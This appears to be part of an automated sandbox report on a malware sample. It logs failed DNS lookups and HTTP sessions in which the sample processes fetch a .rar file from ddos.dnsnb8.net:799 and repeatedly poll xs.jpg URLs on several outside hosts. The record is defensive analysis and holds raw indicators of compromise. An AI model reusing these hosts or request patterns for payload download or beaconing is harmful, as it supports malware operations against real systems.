                                  Jul 5, 2024 08:03:02.041233063 CEST1.1.1.1192.168.2.90xb922Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:04.094383001 CEST1.1.1.1192.168.2.90x360fName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:05.517040968 CEST1.1.1.1192.168.2.90x110dName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:11.089432955 CEST1.1.1.1192.168.2.90xbeeName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:12.733059883 CEST1.1.1.1192.168.2.90x65acName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:14.111745119 CEST1.1.1.1192.168.2.90xcfe1Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:16.955888033 CEST1.1.1.1192.168.2.90x8558Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:19.563560009 CEST1.1.1.1192.168.2.90x5beeName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:22.526101112 CEST1.1.1.1192.168.2.90x58bbName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:26.488653898 CEST1.1.1.1192.168.2.90x1283Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:27.752643108 CEST1.1.1.1192.168.2.90xa6acName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:28.998536110 CEST1.1.1.1192.168.2.90x94feName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:31.970398903 CEST1.1.1.1192.168.2.90xeed3Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:34.803834915 CEST1.1.1.1192.168.2.90x47e0Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:37.430257082 CEST1.1.1.1192.168.2.90x6905Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:39.019887924 CEST1.1.1.1192.168.2.90x9181Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:40.303546906 CEST1.1.1.1192.168.2.90x5ba3Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:45.795972109 CEST1.1.1.1192.168.2.90xeb28Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:47.514987946 CEST1.1.1.1192.168.2.90xe17Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:48.836306095 CEST1.1.1.1192.168.2.90xc1ebName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:50.132093906 CEST1.1.1.1192.168.2.90x3db1Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:53.074790955 CEST1.1.1.1192.168.2.90x95f9Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:56.033911943 CEST1.1.1.1192.168.2.90xe4fcName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:03:58.530093908 CEST1.1.1.1192.168.2.90xb275Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:02.108762026 CEST1.1.1.1192.168.2.90x723dName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:03.701126099 CEST1.1.1.1192.168.2.90x6de7Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:05.311902046 CEST1.1.1.1192.168.2.90x58d5Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:10.894423962 CEST1.1.1.1192.168.2.90x157eName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:12.168991089 CEST1.1.1.1192.168.2.90xca3dName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:13.804615974 CEST1.1.1.1192.168.2.90x3431Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:15.065406084 CEST1.1.1.1192.168.2.90xdce1Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:17.954627037 CEST1.1.1.1192.168.2.90x4d13Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:20.889190912 CEST1.1.1.1192.168.2.90x4a41Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:23.782605886 CEST1.1.1.1192.168.2.90x2488Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:25.033696890 CEST1.1.1.1192.168.2.90xac1dName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:26.716573954 CEST1.1.1.1192.168.2.90x9007Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:28.032803059 CEST1.1.1.1192.168.2.90xf5c0Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:33.560702085 CEST1.1.1.1192.168.2.90x6bc6Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:35.607798100 CEST1.1.1.1192.168.2.90xe271Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:37.182511091 CEST1.1.1.1192.168.2.90x3f7cName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:38.456892014 CEST1.1.1.1192.168.2.90x6530Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:40.491493940 CEST1.1.1.1192.168.2.90x6f1bName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:43.079343081 CEST1.1.1.1192.168.2.90x9b9fName error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:45.959526062 CEST1.1.1.1192.168.2.90x59cbName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:49.012496948 CEST1.1.1.1192.168.2.90x678fName error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:51.534329891 CEST1.1.1.1192.168.2.90xc9a2Name error (3)g2.arrowhitech.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:54.422445059 CEST1.1.1.1192.168.2.90x6859Name error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:57.370037079 CEST1.1.1.1192.168.2.90xb388Name error (3)althawry.orgnonenoneA (IP address)IN (0x0001)false
                                  Jul 5, 2024 08:04:59.317960978 CEST1.1.1.1192.168.2.90x679cName error (3)amsamex.comnonenoneA (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • ddos.dnsnb8.net:799
                                  • www.careerdesk.org
                                  • arthur.niria.biz
                                  • apple-pie.in
                                  • ahmediye.net
                                  • ampyazilim.com.tr

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.94970644.221.84.1057997348C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:00:56.772121906 CEST288OUTGET /cj//k1.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.94970754.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:00:58.522881031 CEST200OUTGET /images/xs.jpg?5e49a2=6179234 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:00:59.278147936 CEST671INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:00:59 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159259|1720159259|0|1|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.94971044.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:00:59.520486116 CEST192OUTGET /xs.jpg?60b080=25346560 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:00.022613049 CEST662INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:00:59 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159259|1720159259|0|1|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.94971144.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:00.378371954 CEST195OUTGET /images/xs.jpg?63977b=19580529 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:00.866417885 CEST410INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:00 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159260|1720159260|0|1|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.94971278.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:00.929388046 CEST188OUTGET /xs.jpg?71a0be=14893436 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:01.582847118 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:01 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.94971437.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:02.715929985 CEST201OUTGET /images/xs2.jpg?84b38e=43483590 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:03.426892042 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:03 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:03.432642937 CEST211OUTGET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:03.653867006 CEST646INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:03 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:03 GMT
                                  Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 0a 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 00 0f ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 01 00 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 02 01 01 3f 00 1f ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ff da 00 08 01 03 01 01 3f 00 1f [TRUNCATED]
                                  Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)================================================== ? ? ?


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.94971554.244.188.177807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:04.022066116 CEST307OUTGET /images/xs.jpg?e6979d=105784651 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159259|1720159259|0|1|0
                                  Jul 5, 2024 08:01:04.770015001 CEST594INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:04 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159264|1720159259|2|2|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.94971744.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:04.788881063 CEST298OUTGET /xs.jpg?10010fa=33563124 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159259|1720159259|0|1|0
                                  Jul 5, 2024 08:01:05.277690887 CEST585INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:05 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159265|1720159259|3|2|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.94971944.221.84.105807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:05.352632046 CEST301OUTGET /images/xs.jpg?10da53c=53014452 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159260|1720159260|0|1|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:05.840137959 CEST333INHTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:05 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159265|1720159260|2|2|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.94972078.46.2.155807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:05.876739979 CEST189OUTGET /xs.jpg?1209c47=37828750 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:06.558366060 CEST403INHTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:06 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.94972137.230.104.89807248C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 5, 2024 08:01:06.642554045 CEST203OUTGET /images/xs2.jpg?13a89f9=164909000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:07.349090099 CEST933INHTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:07 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
